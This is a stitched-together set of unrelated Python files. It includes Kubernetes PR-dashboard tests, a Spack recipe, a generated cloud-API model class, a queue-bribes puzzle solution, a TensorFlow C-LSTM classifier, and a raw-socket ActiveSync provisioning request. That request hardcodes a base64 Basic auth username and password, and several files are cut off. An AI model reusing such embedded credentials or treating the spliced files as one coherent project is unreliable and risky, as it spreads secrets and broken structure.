BUILDS = { 'build': [('12', {'version': 'bb', 'timestamp': 1467147654}, None), ('11', {'version': 'bb', 'timestamp': 1467146654}, {'result': 'PASSED', 'passed': True}), ('10', {'version': 'aa', 'timestamp': 1467136654}, {'result': 'FAILED', 'passed': False})], 'e2e': [('47', {'version': 'bb', 'timestamp': '1467147654'}, {'result': '[UNSET]', 'passed': False}), ('46', {'version': 'aa', 'timestamp': '1467136700'}, {'result': '[UNSET]', 'passed': False})] } def setUp(self): self.init_stubs() def init_pr_directory(self): gcs_async_test.install_handler(self.testbed.get_stub('urlfetch'), {'123/': ['build', 'e2e'], '123/build/': ['11', '10', '12'], # out of order '123/e2e/': ['47', '46']}) for job, builds in self.BUILDS.iteritems(): for build, started, finished in builds: path = '/kubernetes-jenkins/pr-logs/pull/123/%s/%s/' % (job, build) if started: write(path + 'started.json', started) if finished: write(path + 'finished.json', finished) def test_pr_builds(self): self.init_pr_directory() org, repo = view_pr.org_repo('', app.app.config['default_org'], app.app.config['default_repo'], ) builds = view_pr.pr_builds(view_pr.pr_path(org, repo, '123', app.app.config['default_repo'], app.app.config['default_repo'], app.app.config['default_external_services']['gcs_pull_prefix'], )) self.assertEqual(builds, self.BUILDS) def test_pr_handler(self): self.init_pr_directory() response = app.get('/pr/123') self.assertIn('e2e/47', response) self.assertIn('PASSED', response) self.assertIn('colspan="3"', response) # header self.assertIn('github.com/kubernetes/kubernetes/pull/123', response) self.assertIn('28 20:44', response) def test_pr_handler_missing(self): gcs_async_test.install_handler(self.testbed.get_stub('urlfetch'), {'124/': []}) response = app.get('/pr/124') self.assertIn('No Results', response) def test_pr_build_log_redirect(self): path = '123/some-job/55/build-log.txt' response = app.get('/pr/' + path) self.assertEqual(response.status_code, 302) self.assertIn('https://storage.googleapis.com', response.location) self.assertIn(path, response.location) def make_pr(number, involved, payload, repo='kubernetes/kubernetes'): payload.setdefault('attn', {}) payload.setdefault('assignees', []) payload.setdefault('author', involved[0]) payload.setdefault('labels', {}) digest = models.GHIssueDigest.make(repo, number, is_pr=True, is_open=True, involved=involved, payload=payload, updated_at=datetime.datetime.now()) digest.put() class TestDashboard(main_test.TestBase): def setUp(self): app.reset() self.init_stubs() def test_empty(self): resp = app.get('/pr/all') self.assertIn('No Results', resp) resp = app.get('/pr/nobody') self.assertIn('No Results', resp) def test_all(self): make_pr(12, ['foo'], {'title': 'first'}, 'google/cadvisor') make_pr(13, ['bar'], {'title': 'second'}, 'kubernetes/kubernetes') resp = app.get('/pr/all') self.assertIn('Open Kubernetes PRs', resp) self.assertIn('first', resp) self.assertIn('second', resp) def test_json(self): make_pr(12, ['a'], {'title': 'b'}, 'c/d') resp = app.get('/pr/all?format=json') self.assertEqual(resp.headers['Content-Type'], 'application/json') self.assertEqual(len(resp.json), 1) pr = resp.json[0] self.assertEqual(pr['involved'], ['a']) self.assertEqual(pr['number'], 12) self.assertEqual(pr['repo'], 'c/d') def test_one_entry(self): make_pr(123, ['user'], {'attn': {'user': 'fix tests'}}) resp = app.get('/pr/user') self.assertIn('123', resp) def test_case_insensitive(self): "Individual PR pages are case insensitive." make_pr(123, ['user'], {'attn': {'User': 'fix tests'}}) resp = app.get('/pr/UseR') self.assertIn('123', resp) self.assertIn('Needs Attention (1)', resp) def test_milestone(self): "Milestone links filter by milestone." make_pr(123, ['user'], {'attn': {'User': 'fix tests'}}) make_pr(124, ['user'], {'attn': {'user': 'fix tests'}, 'milestone': 'v1.24'}) resp = app.get('/pr/user') self.assertIn('v1.24', resp) self.assertIn('123', resp) self.assertIn('124', resp) resp = app.get('/pr/user?milestone=v1.24') # Don't match timestamps that happen to include "123". self.assertNotRegexpMatches(str(resp), r'\b123\b') self.assertIn('124', resp) @staticmethod def make_session(**kwargs): # set the session cookie directly (easier than the full login flow) serializer = securecookie.SecureCookieSerializer( app.app.config['webapp2_extras.sessions']['secret_key']) return serializer.serialize('session', kwargs) def test_me(self): make_pr(124, ['human'], {'title': 'huge pr!'}) # no cookie: we get redirected resp = app.get('/pr') self.assertEqual(resp.status_code, 302) self.assertEqual(resp.location, 'http://localhost/github_auth/pr') # we have a cookie now: we should get results for 'human' cookie = self.make_session(user='human') resp = app.get('/pr', headers={'Cookie': 'session=%s' % cookie}) self.assertEqual(resp.status_code, 200) self.assertIn('huge pr!', resp) def test_pr_links_user(self): "Individual PR pages grab digest information" gcs_async_test.install_handler(self.testbed.get_stub('urlfetch'), {'12345/': []}) make_pr(12345, ['human'], {'title': 'huge pr!'}) resp = app.get('/pr/12345') self.assertIn('href="/pr/human"', resp) self.assertIn('huge pr!', resp) def test_build_links_user(self): "Build pages show PR information" make_pr(12345, ['human'], {'title': 'huge pr!'}) build_dir = '/kubernetes-jenkins/pr-logs/pull/12345/e2e/5/' write(build_dir + 'started.json', '{}') resp = app.get('/build' + build_dir) self.assertIn('href="/pr/human"', resp) self.assertIn('huge pr!', resp) def test_acks(self): app.get('/') # initialize session secrets make_pr(124, ['human'], {'title': 'huge pr', 'attn': {'human': 'help#123#456'}}, repo='k/k') cookie = self.make_session(user='human') headers = {'Cookie': 'session=%s' % cookie} def expect_count(count): resp = app.get('/pr', headers=headers) self.assertEqual(resp.body.count('huge pr'), count) # PR should appear twice expect_count(2) # Ack the PR... ack_params = {'command': 'ack', 'repo': 'k/k', 'number': 124, 'latest': 456} app.post_json('/pr', ack_params, headers=headers) expect_count(1) self.assertEqual(view_pr.get_acks('human', []), {'k/k 124': 456}) # Clear the ack app.post_json('/pr', {'command': 'ack-clear'}, headers=headers) expect_count(2) self.assertEqual(view_pr.get_acks('human', []), {}) # Ack with an older latest ack_params['latest'] = 123 app.post_json('/pr', ack_params, headers=headers) expect_count(2) if __name__ == '__main__': unittest.main() # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class Flashdimmsim(Package): """FlashDIMMSim: a reasonably accurate flash DIMM simulator.""" homepage = "https://github.com/slunk/FlashDIMMSim" git = "https://github.com/slunk/FlashDIMMSim.git" version('master', branch='master') build_directory = 'src' def install(self, spec, prefix): with working_dir(self.build_directory): make() # build program make('libfdsim.so') # build shared library mkdir(prefix.bin) mkdir(prefix.lib) mkdir(prefix.include) install_tree('ini', join_path(prefix, 'ini')) install('FDSim', prefix.bin) install('libfdsim.so', prefix.lib) install('*.h', prefix.include) 10-100 # coding: utf-8 """ vserver Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six from ncloud_vserver.model.common_code import CommonCode # noqa: F401,E501 class ServerInstance(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'server_instance_no': 'str', 'server_name': 'str', 'server_description': 'str', 'cpu_count': 'int', 'memory_size': 'int', 'platform_type': 'CommonCode', 'login_key_name': 'str', 'public_ip_instance_no': 'str', 'public_ip': 'str', 'server_instance_status': 'CommonCode', 'server_instance_operation': 'CommonCode', 'server_instance_status_name': 'str', 'create_date': 'str', 'uptime': 'str', 'server_image_product_code': 'str', 'server_product_code': 'str', 'is_protect_server_termination': 'bool', 'zone_code': 'str', 'region_code': 'str', 'vpc_no': 'str', 'subnet_no': 'str', 'network_interface_no_list': 'list[str]', 'init_script_no': 'str', 'server_instance_type': 'CommonCode', 'base_block_storage_disk_type': 'CommonCode', 'base_block_storage_disk_detail_type': 'CommonCode', 'placement_group_no': 'str' } attribute_map = { 'server_instance_no': 'serverInstanceNo', 'server_name': 'serverName', 'server_description': 'serverDescription', 'cpu_count': 'cpuCount', 'memory_size': 'memorySize', 'platform_type': 'platformType', 'login_key_name': 'loginKeyName', 'public_ip_instance_no': 'publicIpInstanceNo', 'public_ip': 'publicIp', 'server_instance_status': 'serverInstanceStatus', 'server_instance_operation': 'serverInstanceOperation', 'server_instance_status_name': 'serverInstanceStatusName', 'create_date': 'createDate', 'uptime': 'uptime', 'server_image_product_code': 'serverImageProductCode', 'server_product_code': 'serverProductCode', 'is_protect_server_termination': 'isProtectServerTermination', 'zone_code': 'zoneCode', 'region_code': 'regionCode', 'vpc_no': 'vpcNo', 'subnet_no': 'subnetNo', 'network_interface_no_list': 'networkInterfaceNoList', 'init_script_no': 'initScriptNo', 'server_instance_type': 'serverInstanceType', 'base_block_storage_disk_type': 'baseBlockStorageDiskType', 'base_block_storage_disk_detail_type': 'baseBlockStorageDiskDetailType', 'placement_group_no': 'placementGroupNo' } def __init__(self, server_instance_no=None, server_name=None, server_description=None, cpu_count=None, memory_size=None, platform_type=None, login_key_name=None, public_ip_instance_no=None, public_ip=None, server_instance_status=None, server_instance_operation=None, server_instance_status_name=None, create_date=None, uptime=None, server_image_product_code=None, server_product_code=None, is_protect_server_termination=None, zone_code=None, region_code=None, vpc_no=None, subnet_no=None, network_interface_no_list=None, init_script_no=None, server_instance_type=None, base_block_storage_disk_type=None, base_block_storage_disk_detail_type=None, placement_group_no=None): # noqa: E501 """ServerInstance - a model defined in Swagger""" # noqa: E501 self._server_instance_no = None self._server_name = None self._server_description = None self._cpu_count = None self._memory_size = None self._platform_type = None self._login_key_name = None self._public_ip_instance_no = None self._public_ip = None self._server_instance_status = None self._server_instance_operation = None self._server_instance_status_name = None self._create_date = None self._uptime = None self._server_image_product_code = None self._server_product_code = None self._is_protect_server_termination = None self._zone_code = None self._region_code = None self._vpc_no = None self._subnet_no = None self._network_interface_no_list = None self._init_script_no = None self._server_instance_type = None self._base_block_storage_disk_type = None self._base_block_storage_disk_detail_type = None self._placement_group_no = None self.discriminator = None if server_instance_no is not None: self.server_instance_no = server_instance_no if server_name is not None: self.server_name = server_name if server_description is not None: self.server_description = server_description if cpu_count is not None: self.cpu_count = cpu_count if memory_size is not None: self.memory_size = memory_size if platform_type is not None: self.platform_type = platform_type if login_key_name is not None: self.login_key_name = login_key_name if public_ip_instance_no is not None: self.public_ip_instance_no = public_ip_instance_no if public_ip is not None: self.public_ip = public_ip if server_instance_status is not None: self.server_instance_status = server_instance_status if server_instance_operation is not None: self.server_instance_operation = server_instance_operation if server_instance_status_name is not None: self.server_instance_status_name = server_instance_status_name if create_date is not None: self.create_date = create_date if uptime is not None: self.uptime = uptime if server_image_product_code is not None: self.server_image_product_code = server_image_product_code if server_product_code is not None: self.server_product_code = server_product_code if is_protect_server_termination is not None: self.is_protect_server_termination = is_protect_server_termination if zone_code is not None: self.zone_code = zone_code if region_code is not None: self.region_code = region_code if vpc_no is not None: self.vpc_no = vpc_no if subnet_no is not None: self.subnet_no = subnet_no if network_interface_no_list is not None: self.network_interface_no_list = network_interface_no_list if init_script_no is not None: self.init_script_no = init_script_no if server_instance_type is not None: self.server_instance_type = server_instance_type if base_block_storage_disk_type is not None: self.base_block_storage_disk_type = base_block_storage_disk_type if base_block_storage_disk_detail_type is not None: self.base_block_storage_disk_detail_type = base_block_storage_disk_detail_type if placement_group_no is not None: self.placement_group_no = placement_group_no @property def server_instance_no(self): """Gets the server_instance_no of this ServerInstance. # noqa: E501 서버인스턴스번호 # noqa: E501 :return: The server_instance_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_instance_no @server_instance_no.setter def server_instance_no(self, server_instance_no): """Sets the server_instance_no of this ServerInstance. 서버인스턴스번호 # noqa: E501 :param server_instance_no: The server_instance_no of this ServerInstance. # noqa: E501 :type: str """ self._server_instance_no = server_instance_no @property def server_name(self): """Gets the server_name of this ServerInstance. # noqa: E501 서버이름 # noqa: E501 :return: The server_name of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_name @server_name.setter def server_name(self, server_name): """Sets the server_name of this ServerInstance. 서버이름 # noqa: E501 :param server_name: The server_name of this ServerInstance. # noqa: E501 :type: str """ self._server_name = server_name @property def server_description(self): """Gets the server_description of this ServerInstance. # noqa: E501 서버설명 # noqa: E501 :return: The server_description of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_description @server_description.setter def server_description(self, server_description): """Sets the server_description of this ServerInstance. 서버설명 # noqa: E501 :param server_description: The server_description of this ServerInstance. # noqa: E501 :type: str """ self._server_description = server_description @property def cpu_count(self): """Gets the cpu_count of this ServerInstance. # noqa: E501 CPU개수 # noqa: E501 :return: The cpu_count of this ServerInstance. # noqa: E501 :rtype: int """ return self._cpu_count @cpu_count.setter def cpu_count(self, cpu_count): """Sets the cpu_count of this ServerInstance. CPU개수 # noqa: E501 :param cpu_count: The cpu_count of this ServerInstance. # noqa: E501 :type: int """ self._cpu_count = cpu_count @property def memory_size(self): """Gets the memory_size of this ServerInstance. # noqa: E501 메모리사이즈 # noqa: E501 :return: The memory_size of this ServerInstance. # noqa: E501 :rtype: int """ return self._memory_size @memory_size.setter def memory_size(self, memory_size): """Sets the memory_size of this ServerInstance. 메모리사이즈 # noqa: E501 :param memory_size: The memory_size of this ServerInstance. # noqa: E501 :type: int """ self._memory_size = memory_size @property def platform_type(self): """Gets the platform_type of this ServerInstance. # noqa: E501 플랫폼유형 # noqa: E501 :return: The platform_type of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._platform_type @platform_type.setter def platform_type(self, platform_type): """Sets the platform_type of this ServerInstance. 플랫폼유형 # noqa: E501 :param platform_type: The platform_type of this ServerInstance. # noqa: E501 :type: CommonCode """ self._platform_type = platform_type @property def login_key_name(self): """Gets the login_key_name of this ServerInstance. # noqa: E501 로그인키이름 # noqa: E501 :return: The login_key_name of this ServerInstance. # noqa: E501 :rtype: str """ return self._login_key_name @login_key_name.setter def login_key_name(self, login_key_name): """Sets the login_key_name of this ServerInstance. 로그인키이름 # noqa: E501 :param login_key_name: The login_key_name of this ServerInstance. # noqa: E501 :type: str """ self._login_key_name = login_key_name @property def public_ip_instance_no(self): """Gets the public_ip_instance_no of this ServerInstance. # noqa: E501 공인IP인스턴스번호 # noqa: E501 :return: The public_ip_instance_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._public_ip_instance_no @public_ip_instance_no.setter def public_ip_instance_no(self, public_ip_instance_no): """Sets the public_ip_instance_no of this ServerInstance. 공인IP인스턴스번호 # noqa: E501 :param public_ip_instance_no: The public_ip_instance_no of this ServerInstance. # noqa: E501 :type: str """ self._public_ip_instance_no = public_ip_instance_no @property def public_ip(self): """Gets the public_ip of this ServerInstance. # noqa: E501 공인IP주소 # noqa: E501 :return: The public_ip of this ServerInstance. # noqa: E501 :rtype: str """ return self._public_ip @public_ip.setter def public_ip(self, public_ip): """Sets the public_ip of this ServerInstance. 공인IP주소 # noqa: E501 :param public_ip: The public_ip of this ServerInstance. # noqa: E501 :type: str """ self._public_ip = public_ip @property def server_instance_status(self): """Gets the server_instance_status of this ServerInstance. # noqa: E501 서버인스턴스상태 # noqa: E501 :return: The server_instance_status of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._server_instance_status @server_instance_status.setter def server_instance_status(self, server_instance_status): """Sets the server_instance_status of this ServerInstance. 서버인스턴스상태 # noqa: E501 :param server_instance_status: The server_instance_status of this ServerInstance. # noqa: E501 :type: CommonCode """ self._server_instance_status = server_instance_status @property def server_instance_operation(self): """Gets the server_instance_operation of this ServerInstance. # noqa: E501 서버인스턴스OP # noqa: E501 :return: The server_instance_operation of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._server_instance_operation @server_instance_operation.setter def server_instance_operation(self, server_instance_operation): """Sets the server_instance_operation of this ServerInstance. 서버인스턴스OP # noqa: E501 :param server_instance_operation: The server_instance_operation of this ServerInstance. # noqa: E501 :type: CommonCode """ self._server_instance_operation = server_instance_operation @property def server_instance_status_name(self): """Gets the server_instance_status_name of this ServerInstance. # noqa: E501 서버인스턴스상태이름 # noqa: E501 :return: The server_instance_status_name of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_instance_status_name @server_instance_status_name.setter def server_instance_status_name(self, server_instance_status_name): """Sets the server_instance_status_name of this ServerInstance. 서버인스턴스상태이름 # noqa: E501 :param server_instance_status_name: The server_instance_status_name of this ServerInstance. # noqa: E501 :type: str """ self._server_instance_status_name = server_instance_status_name @property def create_date(self): """Gets the create_date of this ServerInstance. # noqa: E501 생성일시 # noqa: E501 :return: The create_date of this ServerInstance. # noqa: E501 :rtype: str """ return self._create_date @create_date.setter def create_date(self, create_date): """Sets the create_date of this ServerInstance. 생성일시 # noqa: E501 :param create_date: The create_date of this ServerInstance. # noqa: E501 :type: str """ self._create_date = create_date @property def uptime(self): """Gets the uptime of this ServerInstance. # noqa: E501 업시간 # noqa: E501 :return: The uptime of this ServerInstance. # noqa: E501 :rtype: str """ return self._uptime @uptime.setter def uptime(self, uptime): """Sets the uptime of this ServerInstance. 업시간 # noqa: E501 :param uptime: The uptime of this ServerInstance. # noqa: E501 :type: str """ self._uptime = uptime @property def server_image_product_code(self): """Gets the server_image_product_code of this ServerInstance. # noqa: E501 서버이미지상품코드 # noqa: E501 :return: The server_image_product_code of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_image_product_code @server_image_product_code.setter def server_image_product_code(self, server_image_product_code): """Sets the server_image_product_code of this ServerInstance. 서버이미지상품코드 # noqa: E501 :param server_image_product_code: The server_image_product_code of this ServerInstance. # noqa: E501 :type: str """ self._server_image_product_code = server_image_product_code @property def server_product_code(self): """Gets the server_product_code of this ServerInstance. # noqa: E501 서버상품코드 # noqa: E501 :return: The server_product_code of this ServerInstance. # noqa: E501 :rtype: str """ return self._server_product_code @server_product_code.setter def server_product_code(self, server_product_code): """Sets the server_product_code of this ServerInstance. 서버상품코드 # noqa: E501 :param server_product_code: The server_product_code of this ServerInstance. # noqa: E501 :type: str """ self._server_product_code = server_product_code @property def is_protect_server_termination(self): """Gets the is_protect_server_termination of this ServerInstance. # noqa: E501 서버반납보호설정여부 # noqa: E501 :return: The is_protect_server_termination of this ServerInstance. # noqa: E501 :rtype: bool """ return self._is_protect_server_termination @is_protect_server_termination.setter def is_protect_server_termination(self, is_protect_server_termination): """Sets the is_protect_server_termination of this ServerInstance. 서버반납보호설정여부 # noqa: E501 :param is_protect_server_termination: The is_protect_server_termination of this ServerInstance. # noqa: E501 :type: bool """ self._is_protect_server_termination = is_protect_server_termination @property def zone_code(self): """Gets the zone_code of this ServerInstance. # noqa: E501 ZONE코드 # noqa: E501 :return: The zone_code of this ServerInstance. # noqa: E501 :rtype: str """ return self._zone_code @zone_code.setter def zone_code(self, zone_code): """Sets the zone_code of this ServerInstance. ZONE코드 # noqa: E501 :param zone_code: The zone_code of this ServerInstance. # noqa: E501 :type: str """ self._zone_code = zone_code @property def region_code(self): """Gets the region_code of this ServerInstance. # noqa: E501 REGION코드 # noqa: E501 :return: The region_code of this ServerInstance. # noqa: E501 :rtype: str """ return self._region_code @region_code.setter def region_code(self, region_code): """Sets the region_code of this ServerInstance. REGION코드 # noqa: E501 :param region_code: The region_code of this ServerInstance. # noqa: E501 :type: str """ self._region_code = region_code @property def vpc_no(self): """Gets the vpc_no of this ServerInstance. # noqa: E501 VPC번호 # noqa: E501 :return: The vpc_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._vpc_no @vpc_no.setter def vpc_no(self, vpc_no): """Sets the vpc_no of this ServerInstance. VPC번호 # noqa: E501 :param vpc_no: The vpc_no of this ServerInstance. # noqa: E501 :type: str """ self._vpc_no = vpc_no @property def subnet_no(self): """Gets the subnet_no of this ServerInstance. # noqa: E501 서브넷번호 # noqa: E501 :return: The subnet_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._subnet_no @subnet_no.setter def subnet_no(self, subnet_no): """Sets the subnet_no of this ServerInstance. 서브넷번호 # noqa: E501 :param subnet_no: The subnet_no of this ServerInstance. # noqa: E501 :type: str """ self._subnet_no = subnet_no @property def network_interface_no_list(self): """Gets the network_interface_no_list of this ServerInstance. # noqa: E501 네트워크인터페이스번호리스트 # noqa: E501 :return: The network_interface_no_list of this ServerInstance. # noqa: E501 :rtype: list[str] """ return self._network_interface_no_list @network_interface_no_list.setter def network_interface_no_list(self, network_interface_no_list): """Sets the network_interface_no_list of this ServerInstance. 네트워크인터페이스번호리스트 # noqa: E501 :param network_interface_no_list: The network_interface_no_list of this ServerInstance. # noqa: E501 :type: list[str] """ self._network_interface_no_list = network_interface_no_list @property def init_script_no(self): """Gets the init_script_no of this ServerInstance. # noqa: E501 초기화스크립트번호 # noqa: E501 :return: The init_script_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._init_script_no @init_script_no.setter def init_script_no(self, init_script_no): """Sets the init_script_no of this ServerInstance. 초기화스크립트번호 # noqa: E501 :param init_script_no: The init_script_no of this ServerInstance. # noqa: E501 :type: str """ self._init_script_no = init_script_no @property def server_instance_type(self): """Gets the server_instance_type of this ServerInstance. # noqa: E501 서버인스턴스유형 # noqa: E501 :return: The server_instance_type of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._server_instance_type @server_instance_type.setter def server_instance_type(self, server_instance_type): """Sets the server_instance_type of this ServerInstance. 서버인스턴스유형 # noqa: E501 :param server_instance_type: The server_instance_type of this ServerInstance. # noqa: E501 :type: CommonCode """ self._server_instance_type = server_instance_type @property def base_block_storage_disk_type(self): """Gets the base_block_storage_disk_type of this ServerInstance. # noqa: E501 기본블록스토리지디스크유형 # noqa: E501 :return: The base_block_storage_disk_type of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._base_block_storage_disk_type @base_block_storage_disk_type.setter def base_block_storage_disk_type(self, base_block_storage_disk_type): """Sets the base_block_storage_disk_type of this ServerInstance. 기본블록스토리지디스크유형 # noqa: E501 :param base_block_storage_disk_type: The base_block_storage_disk_type of this ServerInstance. # noqa: E501 :type: CommonCode """ self._base_block_storage_disk_type = base_block_storage_disk_type @property def base_block_storage_disk_detail_type(self): """Gets the base_block_storage_disk_detail_type of this ServerInstance. # noqa: E501 기본블록스토리지디스크상세유형 # noqa: E501 :return: The base_block_storage_disk_detail_type of this ServerInstance. # noqa: E501 :rtype: CommonCode """ return self._base_block_storage_disk_detail_type @base_block_storage_disk_detail_type.setter def base_block_storage_disk_detail_type(self, base_block_storage_disk_detail_type): """Sets the base_block_storage_disk_detail_type of this ServerInstance. 기본블록스토리지디스크상세유형 # noqa: E501 :param base_block_storage_disk_detail_type: The base_block_storage_disk_detail_type of this ServerInstance. # noqa: E501 :type: CommonCode """ self._base_block_storage_disk_detail_type = base_block_storage_disk_detail_type @property def placement_group_no(self): """Gets the placement_group_no of this ServerInstance. # noqa: E501 물리배치그룹번호 # noqa: E501 :return: The placement_group_no of this ServerInstance. # noqa: E501 :rtype: str """ return self._placement_group_no @placement_group_no.setter def placement_group_no(self, placement_group_no): """Sets the placement_group_no of this ServerInstance. 물리배치그룹번호 # noqa: E501 :param placement_group_no: The placement_group_no of this ServerInstance. # noqa: E501 :type: str """ self._placement_group_no = placement_group_no def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ServerInstance): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other import socket with socket.create_connection( ("192.168.1.32",80) ) as s: s.send( b'''POST /Microsoft-Server-ActiveSync?jRQJBBBRZkNHIVeRkWMoY4GGI1hiBAAAAAACU1A= HTTP/1.1 Host: 192.168.1.32 User-Agent: MJOHNSONTEST/1.0 Authorization: Basic dGJveEBhcmNoLmxvY2FsOlBhc3N3b3JkMTs= Content-Type: application/vnd.ms-sync Content-Length: 157 ''') s.send( b'\x03\x01j\x00\x00\x0eE\x00\x12VHW\x03MJohnson Test\x00\x01\x18Y\x03MJOHNSON-TEST/1.0\x00\x01Z\x03Test OS 1.0\x00\x01[\x03English\x00\x01\x1c`\x03MJOHNSON-TEST/1.0\x00\x01a\x030\x00\x01b\x03OperatorName\x00\x01\x01\x01\x00\x0eFGH\x03MS-EAS-Provisioning-WBXML\x00\x01\x01\x01\x01' ) print( s.recv(4096) ) gcvalderrama/python_foundations import unittest from collections import defaultdict, deque import sys def minimumBribes(q): moves = 0 for pos, val in enumerate(q): d = (val - 1) - pos if d > 2: return "Too chaotic" start = max(0, val - 2) end = pos + 1 for j in range(start, end): if q[j] > val: moves += 1 return moves def minimumBribesa(final): n = len(final) queue = [i for i in range(1, n + 1)] state = defaultdict(int) n = len(final) for index in range(n): state[final[index]] = index movements = 0 ite = deque(queue[:]) while ite: target = ite.popleft() pos = state[target] index = queue.index(target) dist = abs(pos - index) if dist > 2: return "Too chaotic" while queue[pos] != target: movements += 1 temp = queue[index + 1] queue[index + 1] = target queue[index] = temp index = index + 1 return movements class Test(unittest.TestCase): def test_case(self): peaple = 5 target = [2, 1, 5, 3, 4] result = minimumBribes(target) self.assertEqual(3, result) def test_case_caotic(self): peaple = 5 target = [2, 5, 1, 3, 4] result = minimumBribes(target) self.assertEqual("Too chaotic", result) def test_case_caotic_b(self): target = [5, 1, 2, 3, 7, 8, 6, 4] result = minimumBribes(target) self.assertEqual("Too chaotic", result) def test_case_caotic(self): #arget = [1, 2, 3, 4, 5, 6, 7, 8] target = [1, 2, 5, 3, 7, 8, 6, 4] result = minimumBribes(target) self.assertEqual(7, result) # -*- coding: utf-8 -*- import numpy as np import tensorflow as tf class clstm_clf(object): """ A C-LSTM classifier for text classification Reference: A C-LSTM Neural Network for Text Classification """ def __init__(self, config): self.max_length = config.max_length self.num_classes = config.num_classes self.vocab_size = config.vocab_size self.embedding_size = config.embedding_size self.filter_sizes = list(map(int, config.filter_sizes.split(","))) self.num_filters = config.num_filters self.hidden_size = len(self.filter_sizes) * self.num_filters self.num_layers = config.num_layers self.l2_reg_lambda = config.l2_reg_lambda # Placeholders self.batch_size = tf.placeholder(dtype=tf.int32, shape=[], name='batch_size') self.input_x = tf.placeholder(dtype=tf.int32, shape=[None, self.max_length], name='input_x') self.input_y = tf.placeholder(dtype=tf.int64, shape=[None], name='input_y') self.keep_prob = tf.placeholder(dtype=tf.float32, shape=[], name='keep_prob') self.sequence_length = tf.placeholder(dtype=tf.int32, shape=[None], name='sequence_length') # L2 loss self.l2_loss = tf.constant(0.0) # Word embedding with tf.device('/cpu:0'), tf.name_scope('embedding'): embedding = tf.Variable(tf.random_uniform([self.vocab_size, self.embedding_size], -1.0, 1.0), name="embedding") embed = tf.nn.embedding_lookup(embedding, self.input_x) inputs = tf.expand_dims(embed, -1) # Input dropout inputs = tf.nn.dropout(inputs, keep_prob=self.keep_prob) conv_outputs = [] max_feature_length = self.max_length - max(self.filter_sizes) + 1 # Convolutional layer with different lengths of filters in parallel # No max-pooling for i, filter_size in enumerate(self.filter_sizes): with tf.variable_scope('conv-%s' % filter_size): # [filter size, embedding size, channels, number of filters] filter_shape = [filter_size, self.embedding_size, 1, self.num_filters] W = tf.get_variable('weights', filter_shape, initializer=tf.truncated_normal_initializer(stddev=0.1)) b = tf.get_variable('biases', [self.num_filters], initializer=tf.constant_initializer(0.0)) # Convolution conv = tf.nn.conv2d(inputs, W, strides=[1, 1, 1, 1], padding='VALID', name='conv') # Activation function h = tf.nn.relu(tf.nn.bias_add(conv, b), name='relu') # Remove channel dimension h_reshape = tf.squeeze(h, [2]) # Cut the feature sequence at the end based on the maximum filter length h_reshape = h_reshape[:, :max_feature_length, :] conv_outputs.append(h_reshape) # Concatenate the outputs from different filters if len(self.filter_sizes) > 1: rnn_inputs = tf.concat(conv_outputs, -1) else: rnn_inputs = h_reshape # LSTM cell cell = tf.contrib.rnn.LSTMCell(self.hidden_size, forget_bias=1.0, state_is_tuple=True, reuse=tf.get_variable_scope().reuse) # Add dropout to LSTM cell cell = tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=self.keep_prob) # Stacked LSTMs cell = tf.contrib.rnn.MultiRNNCell([cell]*self.num_layers, state_is_tuple=True) self._initial_state = cell.zero_state(self.batch_size, dtype=tf.float32) # Feed the CNN outputs to LSTM network with tf.variable_scope('LSTM'): outputs, state = tf.nn.dynamic_rnn(cell, rnn_inputs, initial_state=self._initial_state, sequence_length=self.sequence_length) self.final_state = state # Softmax output layer with tf.name_scope('softmax'): softmax_w = tf.get_variable('softmax_w', shape=[self.hidden_size, self.num_classes], dtype=tf.float32) softmax_b = tf.get_variable('softmax_b', shape=[self.num_classes], dtype=tf.float32) # L2 regularization for output layer self.l2_loss += tf.nn.l2_loss(softmax_w) self.l2_loss += tf.nn.l2_loss(softmax_b) # logits self.logits = tf.matmul(self.final_state[self.num_layers - 1].h, softmax_w) + softmax_b predictions = tf.nn.softmax(self.logits) self.predictions = tf.argmax(predictions, 1, name='predictions') # Loss with tf.name_scope('loss'): losses = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.input_y, logits=self.logits) self.cost = tf.reduce_mean(losses) + self.l2_reg_lambda * self.l2_loss # Accuracy with tf.name_scope('accuracy'): correct_predictions = tf.equal(self.predictions, self.input_y) self.correct_num = tf.reduce_sum(tf.cast(correct_predictions, tf.float32)) self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32), name='accuracy') 1-10 #!/usr/bin/env python # -*- coding: utf-8 -*- from pathlib import Path from typing import TYPE_CHECKING, Callable, Type import pytest from sqlalchemy.orm import Session from smorest_sfs.plugins.hierachy_xlsx.parsers import HierachyParser from smorest_sfs.utils.paths import ProjectPath from .utils import 